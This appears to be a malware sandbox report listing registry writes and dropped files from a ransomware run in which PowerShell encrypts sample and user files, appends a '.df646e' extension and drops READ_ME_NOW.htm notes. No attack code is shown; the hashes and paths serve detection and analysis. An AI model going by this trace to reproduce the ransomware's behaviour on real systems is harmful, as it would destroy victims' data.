HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListXMLVersionHigh
268435456
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
CVListLastUpdateTime
3670862
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VendorId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DeviceId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
SubSysId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Revision
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionHigh
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
VersionLow
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
DXFeatureLevel
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VendorId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DeviceId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-SubSysId
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-Revision
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionHigh
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-VersionLow
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\GPU
Wow64-DXFeatureLevel
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionLowPart
2
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
HashFileVersionHighPart
0
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateLowDateTime
1077182848
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\UrlBlockManager
NextCheckForUpdateHighDateTime
30768862
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionHigh
268435456
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
IECompatVersionLow
395188360
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\BrowserEmulation
StaleCompatCache
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames
it-IT
it-IT.1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\DomainSuggestion
NextUpdateDate
277395453
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarText
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarOKText
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPGoldbarCancelText
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPMSNintervalInDays
20
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPRestoreBarLimit
1
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NTPOnlinePortalVer
3
1952
iexplore.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TabbedBrowsing
NextNTPConfigUpdateDate
277444043
2944
IEXPLORE.EXE
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
CachePrefix
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
CachePrefix
Cookie:
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
CachePrefix
Visited:
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000007E000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
2944
IEXPLORE.EXE
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2944
IEXPLORE.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
Blob
040000000100000010000000ACB694A59C17E0D791529BB19706A6E419000000010000001000000068CB42B035EA773E52EF50ECF50EC529030000000100000014000000D4DE20D05E66FC53FE1A50882C78DB2852CAE4741D0000000100000010000000918AD43A9475F78BB5243DE886D8103C140000000100000014000000E59D5930824758CCACFA085436867B3AB5044DF062000000010000002000000016AF57A9F676B0AB126095AA5EBADEF22AB31119D644AC95CD4B93DBF3F26AEB0B0000000100000030000000440069006700690043006500720074002000420061006C00740069006D006F0072006500200052006F006F007400000009000000010000003E000000303C06082B0601050507030106082B0601050507030406082B0601050507030206082B0601050507030306082B0601050507030906082B060105050703080F0000000100000014000000CE0E658AA3E847E467A147B3049191093D055E6F53000000010000006200000030603020060A2B06010401B13E01640130123010060A2B0601040182373C0101030200C0301F06096086480186FD6C020130123010060A2B0601040182373C0101030200C0301B060567810C010130123010060A2B0601040182373C0101030200C020000000010000007B030000308203773082025FA0030201020204020000B9300D06092A864886F70D0101050500305A310B300906035504061302494531123010060355040A130942616C74696D6F726531133011060355040B130A43796265725472757374312230200603550403131942616C74696D6F7265204379626572547275737420526F6F74301E170D3030303531323138343630305A170D3235303531323233353930305A305A310B300906035504061302494531123010060355040A130942616C74696D6F726531133011060355040B130A43796265725472757374312230200603550403131942616C74696D6F7265204379626572547275737420526F6F7430820122300D06092A864886F70D01010105000382010F003082010A0282010100A304BB22AB983D57E826729AB579D429E2E1E89580B1B0E35B8E2B299A64DFA15DEDB009056DDB282ECE62A262FEB488DA12EB38EB219DC0412B01527B8877D31C8FC7BAB988B56A09E773E81140A7D1CCCA628D2DE58F0BA650D2A850C328EAF5AB25878A9A961CA967B83F0CD5F7F952132FC21BD57070F08FC012CA06CB9AE1D9CA337A77D6F8ECB9F16844424813D2C0C2A4AE5E60FEB6A605FCB4DD075902D459189863F5A563E0900C7D5DB2067AF385EAEBD403AE5E843E5FFF15ED69BCF939367275CF77524DF3C9902CB93DE5C923533F1F2498215C079929BDC63AECE76E863A6B97746333BD681831F0788D76BFFC9E8E5D2A86A74D90DC271A390203010001A3453043301D0603551D0E04160414E59D5930824758CCACFA085436867B3AB5044DF030120603551D130101FF040830060101FF020103300E0603551D0F0101FF040403020106300D06092A864886F70D01010505000382010100850C5D8EE46F51684205A0DDBB4F27258403BDF764FD2DD730E3A41017EBDA2929B6793F76F6191323B8100AF958A4D46170BD04616A128A17D50ABDC5BC307CD6E90C258D86404FECCCA37E38C637114FEDDD68318E4CD2B30174EEBE755E07481A7F70FF165C84C07985B805FD7FBE6511A30FC002B4F852373904D5A9317A18BFA02AF41299F7A34582E33C5EF59D9EB5C89E7C2EC8A49E4E08144B6DFD706D6B1A63BD64E61FB7CEF0F29F2EBB1BB7F250887392C2E2E3168D9A3202AB8E18DDE91011EE7E35AB90AF3E30947AD0333DA7650FF5FC8E9E62CF47442C015DBB1DB532D247D2382ED0FE81DC326A1EB5EE3CD5FCE7811D19C32442EA6339A9
2944
IEXPLORE.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474
Blob
5C00000001000000040000000008000019000000010000001000000068CB42B035EA773E52EF50ECF50EC529030000000100000014000000D4DE20D05E66FC53FE1A50882C78DB2852CAE4741D0000000100000010000000918AD43A9475F78BB5243DE886D8103C140000000100000014000000E59D5930824758CCACFA085436867B3AB5044DF062000000010000002000000016AF57A9F676B0AB126095AA5EBADEF22AB31119D644AC95CD4B93DBF3F26AEB0B0000000100000030000000440069006700690043006500720074002000420061006C00740069006D006F0072006500200052006F006F007400000009000000010000003E000000303C06082B0601050507030106082B0601050507030406082B0601050507030206082B0601050507030306082B0601050507030906082B060105050703080F0000000100000014000000CE0E658AA3E847E467A147B3049191093D055E6F53000000010000006200000030603020060A2B06010401B13E01640130123010060A2B0601040182373C0101030200C0301F06096086480186FD6C020130123010060A2B0601040182373C0101030200C0301B060567810C010130123010060A2B0601040182373C0101030200C020000000010000007B030000308203773082025FA0030201020204020000B9300D06092A864886F70D0101050500305A310B300906035504061302494531123010060355040A130942616C74696D6F726531133011060355040B130A43796265725472757374312230200603550403131942616C74696D6F7265204379626572547275737420526F6F74301E170D3030303531323138343630305A170D3235303531323233353930305A305A310B300906035504061302494531123010060355040A130942616C74696D6F726531133011060355040B130A43796265725472757374312230200603550403131942616C74696D6F7265204379626572547275737420526F6F7430820122300D06092A864886F70D01010105000382010F003082010A0282010100A304BB22AB983D57E826729AB579D429E2E1E89580B1B0E35B8E2B299A64DFA15DEDB009056DDB282ECE62A262FEB488DA12EB38EB219DC0412B01527B8877D31C8FC7BAB988B56A09E773E81140A7D1CCCA628D2DE58F0BA650D2A850C328EAF5AB25878A9A961CA967B83F0CD5F7F952132FC21BD57070F08FC012CA06CB9AE1D9CA337A77D6F8ECB9F16844424813D2C0C2A4AE5E60FEB6A605FCB4DD075902D459189863F5A563E0900C7D5DB2067AF385EAEBD403AE5E843E5FFF15ED69BCF939367275CF77524DF3C9902CB93DE5C923533F1F2498215C079929BDC63AECE76E863A6B97746333BD681831F0788D76BFFC9E8E5D2A86A74D90DC271A390203010001A3453043301D0603551D0E04160414E59D5930824758CCACFA085436867B3AB5044DF030120603551D130101FF040830060101FF020103300E0603551D0F0101FF040403020106300D06092A864886F70D01010505000382010100850C5D8EE46F51684205A0DDBB4F27258403BDF764FD2DD730E3A41017EBDA2929B6793F76F6191323B8100AF958A4D46170BD04616A128A17D50ABDC5BC307CD6E90C258D86404FECCCA37E38C637114FEDDD68318E4CD2B30174EEBE755E07481A7F70FF165C84C07985B805FD7FBE6511A30FC002B4F852373904D5A9317A18BFA02AF41299F7A34582E33C5EF59D9EB5C89E7C2EC8A49E4E08144B6DFD706D6B1A63BD64E61FB7CEF0F29F2EBB1BB7F250887392C2E2E3168D9A3202AB8E18DDE91011EE7E35AB90AF3E30947AD0333DA7650FF5FC8E9E62CF47442C015DBB1DB532D247D2382ED0FE81DC326A1EB5EE3CD5FCE7811D19C32442EA6339A9
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateLowDateTime
138516398
2944
IEXPLORE.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\VersionManager
LastCheckForUpdateHighDateTime
30768812
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@C:\Windows\system32\miguiresource.dll,-202
Schedule computer tasks to run automatically.
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@C:\Windows\system32\miguiresource.dll,-203
Microsoft Corporation (c)
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@C:\Windows\system32\miguiresource.dll,-104
1.0
2360
mmc.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
@mmcbase.dll,-14008
Folder
2360
mmc.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MMC\SnapIns\FX:{c7b8fb06-bfe1-4c2e-9217-7a69a95bbac4}
HelpTopic
C:\Windows\Help\taskscheduler.chm
2360
mmc.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\MMC\SnapIns\FX:{c7b8fb06-bfe1-4c2e-9217-7a69a95bbac4}
LinkedHelpTopics
C:\Windows\Help\taskscheduler.chm
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2676
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2744
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US
2980
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
ProxyBypass
1
2980
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
IntranetName
1
2980
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
1
2980
WScript.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
0
2304
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\73\52C64B7E
LanguageList
en-US

Files activity

Executable files
0
Suspicious files
51
Text files
25
Unknown types
1

Dropped files

PID
Process
Filename
Type
2304
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF18e2d9.TMP
binary
MD5: 4c55fb736b5823d4c1f277be226111d3
SHA256: a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460
powershell.exe
C:\Users\admin\Downloads\cemployees.jpg.df646e
binary
MD5: 7e7cd4423ac50bdf9343d7d3b45896f5
SHA256: 52192a830454a1565597b2c3cadde160d4d3dadd4c6ac11542a46574f1a193d3
2304
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\KN2H55GCR5V28921KUAW.temp
––
MD5:  ––
SHA256:  ––
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\Recovery\Active\{2087FE68-EA9F-11E9-9008-5254004AAD21}.dat
binary
MD5: 7b9dc89acf4e6dc85672cc8de72a4ba9
SHA256: 3fc7c3cac23fda193744e65948731e0cfeb0f369df7697076115a7b28291cd99
1952
iexplore.exe
C:\Users\admin\AppData\Local\Temp\~DFBBF06F476E06D6FD.TMP
––
MD5:  ––
SHA256:  ––
2744
powershell.exe
C:\Users\admin\AppData\Local\Temp\AFX50058.tmp
text
MD5: 210a5b7377e1cceb9610c08304f286a6
SHA256: f79411ef3f7b07479f9bc4e8ef919cf9ef00d4ac483c28a2892fefebb6368422
2744
powershell.exe
C:\Users\Public\Libraries\thumbcache_64.db
text
MD5: 3980c8949e5be132bd25ef40aaf86d61
SHA256: ec4eb299c516298e0afd51b5a62d176dfa7985675fa7db0659efd653ea97082d
2744
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
binary
MD5: 4c55fb736b5823d4c1f277be226111d3
SHA256: a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2744
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF17d486.TMP
binary
MD5: 4c55fb736b5823d4c1f277be226111d3
SHA256: a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2744
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BH7YRIA4FEJPZRNQ5C74.temp
––
MD5:  ––
SHA256:  ––
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\search[1].json
text
MD5: 449f61c84cd2f7342f95403c908c0603
SHA256: 19170bd75edc0b5183a2f9fcc3001d9d222deff61e5915ad1127b65ab581a2a1
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\DomainSuggestions\it-IT.1
binary
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\suggestions[1].it-IT
binary
MD5: 5a34cb996293fde2cb7a4ac89587393a
SHA256: c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
1952
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\H6ON485B.txt
text
MD5: 607e8556a0f28faf1faef5f8e8fdb407
SHA256: b60855e2e3a3acbd5e6533a7ad62f615c689e87606c49ad57fb35a0f5d4f1799
1952
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\L4OLDDDB.txt
––
MD5:  ––
SHA256:  ––
1952
iexplore.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\WIL8EEEE.txt
––
MD5:  ––
SHA256:  ––
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\urlblockindex[1].bin
binary
MD5: fa518e3dfae8ca3a0e495460fd60c791
SHA256: 775853600060162c4b4e5f883f9fd5a278e61c471b3ee1826396b6d129499aa7
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\iecompatdata.xml
xml
MD5: 7c0e98813a48d3d9d55c1037a6d2fa68
SHA256: 5b8274093f4b5529f6f7b0977167fd202c1d6fc1a7a9d3931a1b04c3ee8b8cad
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\iecompatviewlist[1].xml
xml
MD5: 7c0e98813a48d3d9d55c1037a6d2fa68
SHA256: 5b8274093f4b5529f6f7b0977167fd202c1d6fc1a7a9d3931a1b04c3ee8b8cad
1952
iexplore.exe
C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
––
MD5:  ––
SHA256:  ––
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K78MRVB5\favicon[1].ico
image
MD5: 9fb559a691078558e77d6848202f6541
SHA256: 6d8a01dc7647bc218d003b58fe04049e24a9359900b7e0cebae76edf85b8b914
1952
iexplore.exe
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BDW1XBVN\favicon[1].ico
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\AppData\Local\Temp\quanto98.tmp
text
MD5: 4ee5a4d89c05fa6404ea5ff3fcee699b
SHA256: f3ede7f5ab7aaaaff6f9211d30121eddf78ec8b31a7b5924ac134b18540e4510
2460
powershell.exe
C:\Users\Public\Videos\Sample Videos\READ_ME_NOW.htm
html
MD5: 6a32db37bc63024a29180927fade54dc
SHA256: c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv.df646e
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg.df646e
binary
MD5: f5a579c6c4fae80dce4be54ba93ec8c5
SHA256: 412266211e75cbfa161eebcc6847c550980c058e3f2746c329718e1bbc15faec
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Tulips.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg.df646e
binary
MD5: 6c4c7de9f79f4bf4753f293d226b2ce1
SHA256: db8262bcd50722f0726b3fb8abd7a73bf13d4431b2d6f95fc185103b5a051bea
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Penguins.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.df646e
binary
MD5: cfecc224d691ccd582069da79e58a99a
SHA256: 887f4f85a29679a75bef7ff2066fbaa104b6ac7ae30ca216ce40da8bb5f3df73
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg
binary
MD5: cfecc224d691ccd582069da79e58a99a
SHA256: 887f4f85a29679a75bef7ff2066fbaa104b6ac7ae30ca216ce40da8bb5f3df73
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.df646e
binary
MD5: badf9083a0d9351839dfa648d981c4c7
SHA256: de00be60d6eaeac980f21de07385838c82a0165c2f0efd3d8d1042f57e1f7e2a
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Koala.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.df646e
binary
MD5: 4d0185b8e255633b5e7551659f678352
SHA256: 0e3e347b6f06440da9ea71b801a409042124469f7d54a801e7592dbcd485b125
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.df646e
binary
MD5: 3a85efdce6fd29eae8f6dec0b54509e6
SHA256: ff1e4c18f1a8a1cfa8f0c068a5ed74d96bdf2857ca1a730bd27add6433e32428
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.df646e
binary
MD5: 6a5071e5d377d97c2bf3cde39ba8b71e
SHA256: fd38fbdaadfe962aac8339cd5c13d9460bd942684859f92f792ad60da65e2151
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Desert.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\READ_ME_NOW.htm
html
MD5: 6a32db37bc63024a29180927fade54dc
SHA256: c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.df646e
binary
MD5: 90dc856aa17b6575a915421e0d570ef6
SHA256: 551c3d47b27fd60374e0f8c223dae5bc5742cae21e9fd1b405df54cbac087ff9
2460
powershell.exe
C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Pictures\withoutgeorge.jpg.df646e
binary
MD5: 775a5fd25b990bf57f7289332725c37f
SHA256: 36bcb43c0b6cb808f3584d1c1df44f3cfa6a20a179785cb30c44c403a2d6fa1b
2460
powershell.exe
C:\Users\admin\Pictures\withoutgeorge.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Pictures\loginagency.png.df646e
binary
MD5: d3564cfe200499818d2f4d8c17209d5f
SHA256: 5239e97606e0863ad02992f841232bb6cf9c60feeeb4a07eb04d3ae24c0d5ee2
2460
powershell.exe
C:\Users\admin\Pictures\loginagency.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Pictures\italyu.jpg.df646e
binary
MD5: d918f13baae54728269d777398a41853
SHA256: a9421216c95a07a4ab2d3417653b6cf8586b4bf43fde5b640ce323401411f786
2460
powershell.exe
C:\Users\admin\Pictures\italyu.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Pictures\ideaseveral.jpg.df646e
binary
MD5: 214d2df57fec9fbc48447521caa172a7
SHA256: 54521915fba13a066dfc333b16228499ddd50b9bc5e72153094b46933c75b897
2460
powershell.exe
C:\Users\admin\Pictures\ideaseveral.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Pictures\apractual.png.df646e
binary
MD5: 1342b85002b5c08f66492cf71596a2c4
SHA256: eee8b2ed5b9c0afdffd4d490eb5853c424ccc9d1410aae079e584c438c1fc7be
2460
powershell.exe
C:\Users\admin\Pictures\apractual.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Pictures\READ_ME_NOW.htm
html
MD5: 6a32db37bc63024a29180927fade54dc
SHA256: c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2460
powershell.exe
C:\Users\admin\Pictures\advertisingstation.jpg.df646e
binary
MD5: 3379e20d7e54e9acfc0e2023451f66b1
SHA256: 3d6810848359a0bc3c4599d94116f8d8cc776d97b0258c724165c5c019da5e20
2460
powershell.exe
C:\Users\admin\Pictures\advertisingstation.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Downloads\tommember.png.df646e
binary
MD5: 1c4339cf962a1b73aad1822214d9a9f0
SHA256: 77ac9e370e8acef4c6c4b3b392f8153af851634e562d22281ffa1d6c17d932f3
2460
powershell.exe
C:\Users\admin\Downloads\tommember.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Downloads\rangeavailable.jpg.df646e
binary
MD5: 50b8039d914126a4f4d4943da4eee247
SHA256: d6d1cfa6b086c1e4ce8e970c2eab6649a0f5f1fc6d3ce9000a5170732cd1b804
2460
powershell.exe
C:\Users\admin\Downloads\rangeavailable.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Downloads\ppperformance.jpg.df646e
binary
MD5: 18691ff0b10fa95510577532af1baa0d
SHA256: 6ef164e878dfa263c0b73cba3869f77422523462b1587ffdadfe49a17fc77057
2460
powershell.exe
C:\Users\admin\Downloads\ppperformance.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Downloads\fullsea.png.df646e
binary
MD5: 33ed803461d64e23d04caabc3eca3e98
SHA256: a4a3f53b65ff91518dfbe52152dae7c49dd65e0209a33cff2d07e0b03d72f0bd
2460
powershell.exe
C:\Users\admin\Downloads\fullsea.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Downloads\freejohn.png.df646e
binary
MD5: 59f4d321807a3431f1eb7478e8c8c66f
SHA256: afe7a16b49b05a1afecd26d1742e2741cb3e350fe5069d1971f8d98934032770
2460
powershell.exe
C:\Users\admin\Downloads\freejohn.png
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\AppData\Local\Temp\quanto98.tmp
text
MD5: 0707277a5493140978ad2ccfcc4206e5
SHA256: a85d30e04b7d1a2f4f07d8452f96a16309737dea3584c47992100862dd291f29
2460
powershell.exe
C:\Users\admin\Downloads\READ_ME_NOW.htm
html
MD5: 6a32db37bc63024a29180927fade54dc
SHA256: c0867739a3ee4a5e7afecb66cdde050d0546f8c99715e683a810ea1048fc9cd0
2304
powershell.exe
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
binary
MD5: 4c55fb736b5823d4c1f277be226111d3
SHA256: a7471f464e931aad365e5a751019f5f21931417f3dcd221adc662ed7215eee5b
2460
powershell.exe
C:\Users\admin\Downloads\cemployees.jpg
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\providingletters.rtf.df646e
binary
MD5: 6fc8e0d2e00efc8786e9bc8434e88da9
SHA256: d80ab1371525b095154e95a5b1cf3833f490f0fa7709781be5069ca0b332d69c
2460
powershell.exe
C:\Users\admin\Documents\providingletters.rtf
––
MD5:  ––
SHA256:  ––
2460
powershell.exe
C:\Users\admin\Documents\otherwiselord.rtf.df646e
binary
MD5: a23c29ef3b9a8e519d2daba30c1bc5c4
SHA256: 8402c55a77c839e43dae25490f7f96442c2d02155337db58fbebb57bda8ea98f
2460
powershell.exe
